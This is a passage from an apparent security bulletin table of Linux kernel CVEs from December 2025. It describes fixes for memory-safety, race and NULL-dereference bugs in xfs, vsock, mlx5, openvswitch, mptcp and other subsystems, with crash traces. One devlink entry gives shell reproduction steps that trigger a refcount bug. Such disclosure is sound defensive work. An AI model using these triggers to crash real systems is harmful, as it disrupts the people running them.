https://git.kernel.org/stable/c/c135b8dca65526aa5b8814e9954e0ae317d9c598 https://git.kernel.org/stable/c/d7e313039a8f3a6ee072dc5ff4643234d2d735cf https://git.kernel.org/stable/c/a5bfb13b4f406aef1a450f99d22d3e48df01528c https://git.kernel.org/stable/c/99202d94909d323a30d154ab0261c0a07166daec https://git.kernel.org/stable/c/14c673a2f3ecf650b694a52a88688f1d71849899 https://git.kernel.org/stable/c/4840ceadef4290c56cc422f0fc697655f3cbf070 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nios2: ensure that memblock.current_limit is set when setting pfn limits On nios2, with CONFIG_FLATMEM set, the kernel relies on memblock_get_current_limit() to determine the limits of mem_map, in particular for max_low_pfn. Unfortunately, memblock.current_limit is only default initialized to MEMBLOCK_ALLOC_ANYWHERE at this point of the bootup, potentially leading to situations where max_low_pfn can erroneously exceed the value of max_pfn and, thus, the valid range of available DRAM. This can in turn cause kernel-level paging failures, e.g.: [ 76.900000] Unable to handle kernel paging request at virtual address 20303000 [ 76.900000] ea = c0080890, ra = c000462c, cause = 14 [ 76.900000] Kernel panic - not syncing: Oops [ 76.900000] ---[ end Kernel panic - not syncing: Oops ]--- This patch fixes this by pre-calculating memblock.current_limit based on the upper limits of the available memory ranges via adjust_lowmem_bounds, a simplified version of the equivalent implementation within the arm architecture. | 2025-12-04 | not yet calculated | CVE-2025-40245 | https://git.kernel.org/stable/c/25f09699edd360b534ccae16bc276c3b52c471f3 https://git.kernel.org/stable/c/5c3e38a367822f036227dd52bac82dc4a05157e2 https://git.kernel.org/stable/c/b1ec9faef7e36269ca3ec890972a78effbaeb975 https://git.kernel.org/stable/c/90f5f715550e07cd6a51f80fc3f062d832c8c997 https://git.kernel.org/stable/c/8912814f14e298b83df072fecc1f7ed1b63b1b2c https://git.kernel.org/stable/c/a20b83cf45be2057f3d073506779e52c7fa17f94 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: fix out of bounds memory read error in symlink repair xfs/286 produced this report on my test fleet: ================================================================== BUG: KFENCE: out-of-bounds read in memcpy_orig+0x54/0x110 Out-of-bounds read at 0xffff88843fe9e038 (184B right of kfence-#184): memcpy_orig+0x54/0x110 xrep_symlink_salvage_inline+0xb3/0xf0 [xfs] xrep_symlink_salvage+0x100/0x110 [xfs] xrep_symlink+0x2e/0x80 [xfs] xrep_attempt+0x61/0x1f0 [xfs] xfs_scrub_metadata+0x34f/0x5c0 [xfs] xfs_ioc_scrubv_metadata+0x387/0x560 [xfs] xfs_file_ioctl+0xe23/0x10e0 [xfs] __x64_sys_ioctl+0x76/0xc0 do_syscall_64+0x4e/0x1e0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 kfence-#184: 0xffff88843fe9df80-0xffff88843fe9dfea, size=107, cache=kmalloc-128 allocated by task 3470 on cpu 1 at 263329.131592s (192823.508886s ago): xfs_init_local_fork+0x79/0xe0 [xfs] xfs_iformat_local+0xa4/0x170 [xfs] xfs_iformat_data_fork+0x148/0x180 [xfs] xfs_inode_from_disk+0x2cd/0x480 [xfs] xfs_iget+0x450/0xd60 [xfs] xfs_bulkstat_one_int+0x6b/0x510 [xfs] xfs_bulkstat_iwalk+0x1e/0x30 [xfs] xfs_iwalk_ag_recs+0xdf/0x150 [xfs] xfs_iwalk_run_callbacks+0xb9/0x190 [xfs] xfs_iwalk_ag+0x1dc/0x2f0 [xfs] xfs_iwalk_args.constprop.0+0x6a/0x120 [xfs] xfs_iwalk+0xa4/0xd0 [xfs] xfs_bulkstat+0xfa/0x170 [xfs] xfs_ioc_fsbulkstat.isra.0+0x13a/0x230 [xfs] xfs_file_ioctl+0xbf2/0x10e0 [xfs] __x64_sys_ioctl+0x76/0xc0 do_syscall_64+0x4e/0x1e0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 CPU: 1 UID: 0 PID: 1300113 Comm: xfs_scrub Not tainted 6.18.0-rc4-djwx #rc4 PREEMPT(lazy) 3d744dd94e92690f00a04398d2bd8631dcef1954 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-4.module+el8.8.0+21164+ed375313 04/01/2014 ================================================================== On further analysis, I realized that the second parameter to min() is not correct. xfs_ifork::if_bytes is the size of the xfs_ifork::if_data buffer. if_bytes can be smaller than the data fork size because: (a) the forkoff code tries to keep the data area as large as possible (b) for symbolic links, if_bytes is the ondisk file size + 1 (c) forkoff is always a multiple of 8. Case in point: for a single-byte symlink target, forkoff will be 8 but the buffer will only be 2 bytes long. In other words, the logic here is wrong and we walk off the end of the incore buffer. Fix that. | 2025-12-04 | not yet calculated | CVE-2025-40246 | https://git.kernel.org/stable/c/7c2d68e091584149fe89bcbaf9b99b3162d46ee7 https://git.kernel.org/stable/c/81a8685cac4bf081c93a7df591644f4f80240bb9 https://git.kernel.org/stable/c/678e1cc2f482e0985a0613ab4a5bf89c497e5acc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: Fix pgtable prealloc error path The following splat was reported: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010 Mem abort info: ESR = 0x0000000096000004 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 CM = 0, WnR = 0, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=00000008d0fd8000 [0000000000000010] pgd=0000000000000000, p4d=0000000000000000 Internal error: Oops: 0000000096000004 [#1] SMP CPU: 5 UID: 1000 PID: 149076 Comm: Xwayland Tainted: G S 6.16.0-rc2-00809-g0b6974bb4134-dirty #367 PREEMPT Tainted: [S]=CPU_OUT_OF_SPEC Hardware name: Qualcomm Technologies, Inc. SM8650 HDK (DT) pstate: 83400005 (Nzcv daif +PAN -UAO +TCO +DIT -SSBS BTYPE=--) pc : build_detached_freelist+0x28/0x224 lr : kmem_cache_free_bulk.part.0+0x38/0x244 sp : ffff000a508c7a20 x29: ffff000a508c7a20 x28: ffff000a508c7d50 x27: ffffc4e49d16f350 x26: 0000000000000058 x25: 00000000fffffffc x24: 0000000000000000 x23: ffff00098c4e1450 x22: 00000000fffffffc x21: 0000000000000000 x20: ffff000a508c7af8 x19: 0000000000000002 x18: 00000000000003e8 x17: ffff000809523850 x16: ffff000809523820 x15: 0000000000401640 x14: ffff000809371140 x13: 0000000000000130 x12: ffff0008b5711e30 x11: 00000000001058fa x10: 0000000000000a80 x9 : ffff000a508c7940 x8 : ffff000809371ba0 x7 : 781fffe033087fff x6 : 0000000000000000 x5 : ffff0008003cd000 x4 : 781fffe033083fff x3 : ffff000a508c7af8 x2 : fffffdffc0000000 x1 : 0001000000000000 x0 : ffff0008001a6a00 Call trace: build_detached_freelist+0x28/0x224 (P) kmem_cache_free_bulk.part.0+0x38/0x244 kmem_cache_free_bulk+0x10/0x1c msm_iommu_pagetable_prealloc_cleanup+0x3c/0xd0 msm_vma_job_free+0x30/0x240 msm_ioctl_vm_bind+0x1d0/0x9a0 drm_ioctl_kernel+0x84/0x104 drm_ioctl+0x358/0x4d4 __arm64_sys_ioctl+0x8c/0xe0 invoke_syscall+0x44/0x100 el0_svc_common.constprop.0+0x3c/0xe0 do_el0_svc+0x18/0x20 el0_svc+0x30/0x100 el0t_64_sync_handler+0x104/0x130 el0t_64_sync+0x170/0x174 Code: aa0203f5 b26287e2 f2dfbfe2 aa0303f4 (f8737ab6) ---[ end trace 0000000000000000 ]--- Since msm_vma_job_free() is called directly from the ioctl, this looks like an error path cleanup issue. Which I think results from prealloc_cleanup() called without a preceding successful prealloc_allocate() call. So handle that case better. Patchwork: https://patchwork.freedesktop.org/patch/678677/ | 2025-12-04 | not yet calculated | CVE-2025-40247 | https://git.kernel.org/stable/c/b865da18b6cb878f33b5920693d03f23b9c4d1a3 https://git.kernel.org/stable/c/830d68f2cb8ab6fb798bb9555016709a9e012af0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vsock: Ignore signal/timeout on connect() if already established During connect(), acting on a signal/timeout by disconnecting an already established socket leads to several issues: 1. connect() invoking vsock_transport_cancel_pkt() -> virtio_transport_purge_skbs() may race with sendmsg() invoking virtio_transport_get_credit(). This results in a permanently elevated `vvs->bytes_unsent`. Which, in turn, confuses the SOCK_LINGER handling. 2. connect() resetting a connected socket's state may race with socket being placed in a sockmap. A disconnected socket remaining in a sockmap breaks sockmap's assumptions. And gives rise to WARNs. 3. connect() transitioning SS_CONNECTED -> SS_UNCONNECTED allows for a transport change/drop after TCP_ESTABLISHED. Which poses a problem for any simultaneous sendmsg() or connect() and may result in a use-after-free/null-ptr-deref. Do not disconnect socket on signal/timeout. Keep the logic for unconnected sockets: they don't linger, can't be placed in a sockmap, are rejected by sendmsg(). [1]: https://lore.kernel.org/netdev/e07fd95c-9a38-4eea-9638-133e38c2ec9b@rbox.co/ [2]: https://lore.kernel.org/netdev/20250317-vsock-trans-signal-race-v4-0-fc8837f3f1d4@rbox.co/ [3]: https://lore.kernel.org/netdev/60f1b7db-3099-4f6a-875e-af9f6ef194f6@rbox.co/ | 2025-12-04 | not yet calculated | CVE-2025-40248 | https://git.kernel.org/stable/c/3f71753935d648082a8279a97d30efe6b85be680 https://git.kernel.org/stable/c/da664101fb4a0de5cb70d2bae6a650df954df2af https://git.kernel.org/stable/c/67432915145848658149683101104e32f9fd6559 https://git.kernel.org/stable/c/eeca93f06df89be5a36305b7b9dae1ed65550dfc https://git.kernel.org/stable/c/5998da5a8208ae9ad7838ba322bccb2bdcd95e81 https://git.kernel.org/stable/c/f1c170cae285e4b8f61be043bb17addc3d0a14b5 https://git.kernel.org/stable/c/ab6b19f690d89ae4709fba73a3c4a7911f495b7a https://git.kernel.org/stable/c/002541ef650b742a198e4be363881439bb9d86b4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpio: cdev: make sure the cdev fd is still active before emitting events With the final call to fput() on a file descriptor, the release action may be deferred and scheduled on a work queue. The reference count of that descriptor is still zero and it must not be used. It's possible that a GPIO change that we want to notify user-space about happens AFTER the reference count on the file descriptor associated with the character device went down to zero but BEFORE the .release() callback was called from the workqueue, and so BEFORE we unregistered from the notifier. Using the regular get_file() routine in this situation triggers the following warning: struct file::f_count incremented from zero; use-after-free condition present! So use the get_file_active() variant that will return NULL on file descriptors that have been or are being released. | 2025-12-04 | not yet calculated | CVE-2025-40249 | https://git.kernel.org/stable/c/dccc6daa8afa0f64c432e4c867f275747e3415e1 https://git.kernel.org/stable/c/d4cd0902c156b2ca60fdda8cd8b5bcb4b0e9ed64 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Clean up only new IRQ glue on request_irq() failure The mlx5_irq_alloc() function can inadvertently free the entire rmap and end up in a crash[1] when other threads try to access this, when request_irq() fails due to exhausted IRQ vectors. This commit modifies the cleanup to remove only the specific IRQ mapping that was just added. This prevents removal of other valid mappings and ensures precise cleanup of the failed IRQ allocation's associated glue object. Note: This error is observed when both fwctl and rds configs are enabled. [1] mlx5_core 0000:05:00.0: Successfully registered panic handler for port 1 mlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to request irq. err = -28 infiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while trying to test write-combining support mlx5_core 0000:05:00.0: Successfully unregistered panic handler for port 1 mlx5_core 0000:06:00.0: Successfully registered panic handler for port 1 mlx5_core 0000:06:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to request irq. err = -28 infiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while trying to test write-combining support mlx5_core 0000:06:00.0: Successfully unregistered panic handler for port 1 mlx5_core 0000:03:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to request irq. err = -28 mlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to request irq. err = -28 general protection fault, probably for non-canonical address 0xe277a58fde16f291: 0000 [#1] SMP NOPTI RIP: 0010:free_irq_cpu_rmap+0x23/0x7d Call Trace: <TASK> ? show_trace_log_lvl+0x1d6/0x2f9 ? show_trace_log_lvl+0x1d6/0x2f9 ? mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core] ? __die_body.cold+0x8/0xa ? die_addr+0x39/0x53 ? exc_general_protection+0x1c4/0x3e9 ? dev_vprintk_emit+0x5f/0x90 ? asm_exc_general_protection+0x22/0x27 ? free_irq_cpu_rmap+0x23/0x7d mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core] irq_pool_request_vector+0x7d/0x90 [mlx5_core] mlx5_irq_request+0x2e/0xe0 [mlx5_core] mlx5_irq_request_vector+0xad/0xf7 [mlx5_core] comp_irq_request_pci+0x64/0xf0 [mlx5_core] create_comp_eq+0x71/0x385 [mlx5_core] ? mlx5e_open_xdpsq+0x11c/0x230 [mlx5_core] mlx5_comp_eqn_get+0x72/0x90 [mlx5_core] ? xas_load+0x8/0x91 mlx5_comp_irqn_get+0x40/0x90 [mlx5_core] mlx5e_open_channel+0x7d/0x3c7 [mlx5_core] mlx5e_open_channels+0xad/0x250 [mlx5_core] mlx5e_open_locked+0x3e/0x110 [mlx5_core] mlx5e_open+0x23/0x70 [mlx5_core] __dev_open+0xf1/0x1a5 __dev_change_flags+0x1e1/0x249 dev_change_flags+0x21/0x5c do_setlink+0x28b/0xcc4 ? __nla_parse+0x22/0x3d ? inet6_validate_link_af+0x6b/0x108 ? cpumask_next+0x1f/0x35 ? __snmp6_fill_stats64.constprop.0+0x66/0x107 ? __nla_validate_parse+0x48/0x1e6 __rtnl_newlink+0x5ff/0xa57 ? kmem_cache_alloc_trace+0x164/0x2ce rtnl_newlink+0x44/0x6e rtnetlink_rcv_msg+0x2bb/0x362 ? __netlink_sendskb+0x4c/0x6c ? netlink_unicast+0x28f/0x2ce ? rtnl_calcit.isra.0+0x150/0x146 netlink_rcv_skb+0x5f/0x112 netlink_unicast+0x213/0x2ce netlink_sendmsg+0x24f/0x4d9 __sock_sendmsg+0x65/0x6a ____sys_sendmsg+0x28f/0x2c9 ? import_iovec+0x17/0x2b ___sys_sendmsg+0x97/0xe0 __sys_sendmsg+0x81/0xd8 do_syscall_64+0x35/0x87 entry_SYSCALL_64_after_hwframe+0x6e/0x0 RIP: 0033:0x7fc328603727 Code: c3 66 90 41 54 41 89 d4 55 48 89 f5 53 89 fb 48 83 ec 10 e8 0b ed ff ff 44 89 e2 48 89 ee 89 df 41 89 c0 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 35 44 89 c7 48 89 44 24 08 e8 44 ed ff ff 48 RSP: 002b:00007ffe8eb3f1a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 000000000000000d RCX: 00007fc328603727 RDX: 0000000000000000 RSI: 00007ffe8eb3f1f0 RDI: 000000000000000d RBP: 00007ffe8eb3f1f0 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000 R13: 00000000000 ---truncated--- | 2025-12-04 | not yet calculated | CVE-2025-40250 | https://git.kernel.org/stable/c/69e043bce09c9a77e5f55b9ac7505874a2a1a9f0 https://git.kernel.org/stable/c/6ebd02cf2dde11b86f89ea4c9f55179eab30d4ee https://git.kernel.org/stable/c/4d6b4bea8b80bfa13c903ba547538249e7c5e977 https://git.kernel.org/stable/c/d47515af6cccd7484d8b0870376858c9848a18ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy The function devl_rate_nodes_destroy is documented to "Unset parent for all rate objects". However, it was only calling the driver-specific `rate_leaf_parent_set` or `rate_node_parent_set` ops and decrementing the parent's refcount, without actually setting the `devlink_rate->parent` pointer to NULL. This leaves a dangling pointer in the `devlink_rate` struct, which causes a refcount error in netdevsim[1] and mlx5[2]. In addition, this is inconsistent with the behavior of `devlink_nl_rate_parent_node_set`, where the parent pointer is correctly cleared. This patch fixes the issue by explicitly setting `devlink_rate->parent` to NULL after notifying the driver, thus fulfilling the function's documented behavior for all rate objects. [1] repro steps: echo 1 > /sys/bus/netdevsim/new_device devlink dev eswitch set netdevsim/netdevsim1 mode switchdev echo 1 > /sys/bus/netdevsim/devices/netdevsim1/sriov_numvfs devlink port function rate add netdevsim/netdevsim1/test_node devlink port function rate set netdevsim/netdevsim1/128 parent test_node echo 1 > /sys/bus/netdevsim/del_device dmesg: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 8 PID: 1530 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0 CPU: 8 UID: 0 PID: 1530 Comm: bash Not tainted 6.18.0-rc4+ #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:refcount_warn_saturate+0x42/0xe0 Call Trace: <TASK> devl_rate_leaf_destroy+0x8d/0x90 __nsim_dev_port_del+0x6c/0x70 [netdevsim] nsim_dev_reload_destroy+0x11c/0x140 [netdevsim] nsim_drv_remove+0x2b/0xb0 [netdevsim] device_release_driver_internal+0x194/0x1f0 bus_remove_device+0xc6/0x130 device_del+0x159/0x3c0 device_unregister+0x1a/0x60 del_device_store+0x111/0x170 [netdevsim] kernfs_fop_write_iter+0x12e/0x1e0 vfs_write+0x215/0x3d0 ksys_write+0x5f/0xd0 do_syscall_64+0x55/0x10f0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 [2] devlink dev eswitch set pci/0000:08:00.0 mode switchdev devlink port add pci/0000:08:00.0 flavour pcisf pfnum 0 sfnum 1000 devlink port function rate add pci/0000:08:00.0/group1 devlink port function rate set pci/0000:08:00.0/32768 parent group1 modprobe -r mlx5_ib mlx5_fwctl mlx5_core dmesg: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 7 PID: 16151 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0 CPU: 7 UID: 0 PID: 16151 Comm: bash Not tainted 6.17.0-rc7_for_upstream_min_debug_2025_10_02_12_44 #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 RIP: 0010:refcount_warn_saturate+0x42/0xe0 Call Trace: <TASK> devl_rate_leaf_destroy+0x8d/0x90 mlx5_esw_offloads_devlink_port_unregister+0x33/0x60 [mlx5_core] mlx5_esw_offloads_unload_rep+0x3f/0x50 [mlx5_core] mlx5_eswitch_unload_sf_vport+0x40/0x90 [mlx5_core] mlx5_sf_esw_event+0xc4/0x120 [mlx5_core] notifier_call_chain+0x33/0xa0 blocking_notifier_call_chain+0x3b/0x50 mlx5_eswitch_disable_locked+0x50/0x110 [mlx5_core] mlx5_eswitch_disable+0x63/0x90 [mlx5_core] mlx5_unload+0x1d/0x170 [mlx5_core] mlx5_uninit_one+0xa2/0x130 [mlx5_core] remove_one+0x78/0xd0 [mlx5_core] pci_device_remove+0x39/0xa0 device_release_driver_internal+0x194/0x1f0 unbind_store+0x99/0xa0 kernfs_fop_write_iter+0x12e/0x1e0 vfs_write+0x215/0x3d0 ksys_write+0x5f/0xd0 do_syscall_64+0x53/0x1f0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 | 2025-12-04 | not yet calculated | CVE-2025-40251 | https://git.kernel.org/stable/c/715d9cda646a8a38ea8b2bb5afb679a7464055e2 https://git.kernel.org/stable/c/c70df6c17d389cc743f0eb30160e2d6bc6910db8 https://git.kernel.org/stable/c/542f45486f1ce2d2dde75bd85aca0389ef7046c3 https://git.kernel.org/stable/c/f94c1a114ac209977bdf5ca841b98424295ab1f0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() The loops in 'qede_tpa_cont()' and 'qede_tpa_end()', iterate over 'cqe->len_list[]' using only a zero-length terminator as the stopping condition. If the terminator was missing or malformed, the loop could run past the end of the fixed-size array. Add an explicit bound check using ARRAY_SIZE() in both loops to prevent a potential out-of-bounds access. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2025-12-04 | not yet calculated | CVE-2025-40252 | https://git.kernel.org/stable/c/ecbb12caf399d7cf364b7553ed5aebeaa2f255bc https://git.kernel.org/stable/c/a778912b4a53587ea07d85526d152f85d109cbfe https://git.kernel.org/stable/c/f0923011c1261b33a2ac1de349256d39cb750dd0 https://git.kernel.org/stable/c/917a9d02182ac8b4f25eb47dc02f3ec679608c24 https://git.kernel.org/stable/c/e441db07f208184e0466abf44b389a81d70c340e https://git.kernel.org/stable/c/896f1a2493b59beb2b5ccdf990503dbb16cb2256 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/ctcm: Fix double-kfree The function 'mpc_rcvd_sweep_req(mpcginfo)' is called conditionally from function 'ctcmpc_unpack_skb'. It frees passed mpcginfo. After that a call to function 'kfree' in function 'ctcmpc_unpack_skb' frees it again. Remove 'kfree' call in function 'mpc_rcvd_sweep_req(mpcginfo)'. Bug detected by the clang static analyzer. | 2025-12-04 | not yet calculated | CVE-2025-40253 | https://git.kernel.org/stable/c/06f1dd1de0d33dbfbd2e1fc9fc57d8895f730de2 https://git.kernel.org/stable/c/6bf8ccaabce8cebb6cb1f255c93d0acdfe95c17a https://git.kernel.org/stable/c/7616e2eee679746d526c7f5befd4eedb995935b5 https://git.kernel.org/stable/c/43096dab8cc60fc39133205fd149a54d3acebea8 https://git.kernel.org/stable/c/3b177b2ded563df16f6d5920671ffcfe5915d472 https://git.kernel.org/stable/c/b9dbfb1b5699f9f1e4991f96741bdf9047147589 https://git.kernel.org/stable/c/7ff76f8dc6b550f8d16487bf3cebc278be720b5c https://git.kernel.org/stable/c/da02a1824884d6c84c5e5b5ac373b0c9e3288ec2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: remove never-working support for setting nsh fields The validation of the set(nsh(...)) action is completely wrong. It runs through the nsh_key_put_from_nlattr() function that is the same function that validates NSH keys for the flow match and the push_nsh() action. However, the set(nsh(...)) has a very different memory layout. Nested attributes in there are doubled in size in case of the masked set(). That makes proper validation impossible. There is also confusion in the code between the 'masked' flag, that says that the nested attributes are doubled in size containing both the value and the mask, and the 'is_mask' that says that the value we're parsing is the mask. This is causing a kernel crash on trying to write into the mask part of the match with SW_FLOW_KEY_PUT() during validation, while validate_nsh() doesn't allocate any memory for it: BUG: kernel NULL pointer dereference, address: 0000000000000018 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary) RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch] Call Trace: <TASK> validate_nsh+0x60/0x90 [openvswitch] validate_set.constprop.0+0x270/0x3c0 [openvswitch] __ovs_nla_copy_actions+0x477/0x860 [openvswitch] ovs_nla_copy_actions+0x8d/0x100 [openvswitch] ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch] genl_family_rcv_msg_doit+0xdb/0x130 genl_family_rcv_msg+0x14b/0x220 genl_rcv_msg+0x47/0xa0 netlink_rcv_skb+0x53/0x100 genl_rcv+0x24/0x40 netlink_unicast+0x280/0x3b0 netlink_sendmsg+0x1f7/0x430 ____sys_sendmsg+0x36b/0x3a0 ___sys_sendmsg+0x87/0xd0 __sys_sendmsg+0x6d/0xd0 do_syscall_64+0x7b/0x2c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e The third issue with this process is that while trying to convert the non-masked set into a masked one, validate_set() copies and doubles the size of the OVS_KEY_ATTR_NSH as if it didn't have any nested attributes. It should be copying each nested attribute and doubling them in size independently. And the process must be properly reversed during the conversion back from masked to a non-masked variant during the flow dump. In the end, the only two outcomes of trying to use this action are either validation failure or a kernel crash. And if somehow someone manages to install a flow with such an action, it will most definitely not do what it is supposed to, since all the keys and the masks are mixed up. Fixing all the issues is a complex task as it requires re-writing most of the validation code. Given that and the fact that this functionality never worked since introduction, let's just remove it altogether. It's better to re-introduce it later with a proper implementation instead of trying to fix it in stable releases. | 2025-12-04 | not yet calculated | CVE-2025-40254 | https://git.kernel.org/stable/c/3415faa1fcb4150f29a72c5ecf959339d797feb7 https://git.kernel.org/stable/c/3d2e7d3b28469081ccf08301df07cc411a1cc5e9 https://git.kernel.org/stable/c/f95bef5ba0b88d971b02c776f24bd17544930a3a https://git.kernel.org/stable/c/87d2429381ddcf8cbd30c8c36793a4f7916d5f99 https://git.kernel.org/stable/c/0b903f33c31c82b1c3591279fd8a23893802b987 https://git.kernel.org/stable/c/9c61d8fe1350b7322f4953318165d6719c3b1475 https://git.kernel.org/stable/c/4689ba45296dbb3a47e70a1bc2ed0328263e48f3 https://git.kernel.org/stable/c/dfe28c4167a9259fc0c372d9f9473e1ac95cff67 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: core: prevent NULL deref in generic_hwtstamp_ioctl_lower() The ethtool tsconfig Netlink path can trigger a null pointer dereference. A call chain such as: tsconfig_prepare_data() -> dev_get_hwtstamp_phylib() -> vlan_hwtstamp_get() -> generic_hwtstamp_get_lower() -> generic_hwtstamp_ioctl_lower() results in generic_hwtstamp_ioctl_lower() being called with kernel_cfg->ifr as NULL. The generic_hwtstamp_ioctl_lower() function does not expect a NULL ifr and dereferences it, leading to a system crash. Fix this by adding a NULL check for kernel_cfg->ifr in generic_hwtstamp_ioctl_lower(). If ifr is NULL, return -EINVAL. | 2025-12-04 | not yet calculated | CVE-2025-40255 | https://git.kernel.org/stable/c/8817f816ae41908e9625c0770c4af0dcdcc01238 https://git.kernel.org/stable/c/f796a8dec9beafcc0f6f0d3478ed685a15c5e062 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: also call xfrm_state_delete_tunnel at destroy time for states that were never added In commit b441cf3f8c4b ("xfrm: delete x->tunnel as we delete x"), I missed the case where state creation fails between full initialization (->init_state has been called) and being inserted on the lists. In this situation, ->init_state has been called, so for IPcomp tunnels, the fallback tunnel has been created and added onto the lists, but the user state never gets added, because we fail before that. The user state doesn't go through __xfrm_state_delete, so we don't call xfrm_state_delete_tunnel for those states, and we end up leaking the FB tunnel. There are several codepaths affected by this: the add/update paths, in both net/key and xfrm, and the migrate code (xfrm_migrate, xfrm_state_migrate). A "proper" rollback of the init_state work would probably be doable in the add/update code, but for migrate it gets more complicated as multiple states may be involved. At some point, the new (not-inserted) state will be destroyed, so call xfrm_state_delete_tunnel during xfrm_state_gc_destroy. Most states will have their fallback tunnel cleaned up during __xfrm_state_delete, which solves the issue that b441cf3f8c4b (and other patches before it) aimed at. All states (including FB tunnels) will be removed from the lists once xfrm_state_fini has called flush_work(&xfrm_state_gc_work). | 2025-12-04 | not yet calculated | CVE-2025-40256 | https://git.kernel.org/stable/c/d6fe5c740c573af10943b8353992e1325cdb2715 https://git.kernel.org/stable/c/10deb69864840ccf96b00ac2ab3a2055c0c04721 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix a race in mptcp_pm_del_add_timer() mptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, &entry->add_timer) while another might have freed the entry already, as reported by syzbot. Add RCU protection to fix this issue. Also replace the confusing add_timer variable with a stop_timer boolean. syzbot report: BUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616 Read of size 4 at addr ffff8880311e4150 by task kworker/1:1/44 CPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)} Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Workqueue: events mptcp_worker Call Trace: <TASK> dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616 sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631 mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362 mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174 tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361 tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441 tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931 tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374 ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239 NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318 NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318 __netif_receive_skb_one_core net/core/dev.c:6079 [inline] __netif_receive_skb+0x143/0x380 net/core/dev.c:6192 process_backlog+0x31e/0x900 net/core/dev.c:6544 __napi_poll+0xb6/0x540 net/core/dev.c:7594 napi_poll net/core/dev.c:7657 [inline] net_rx_action+0x5f7/0xda0 net/core/dev.c:7784 handle_softirqs+0x22f/0x710 kernel/softirq.c:622 __do_softirq kernel/softirq.c:656 [inline] __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302 mptcp_pm_send_ack net/mptcp/pm.c:210 [inline] mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1 mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002 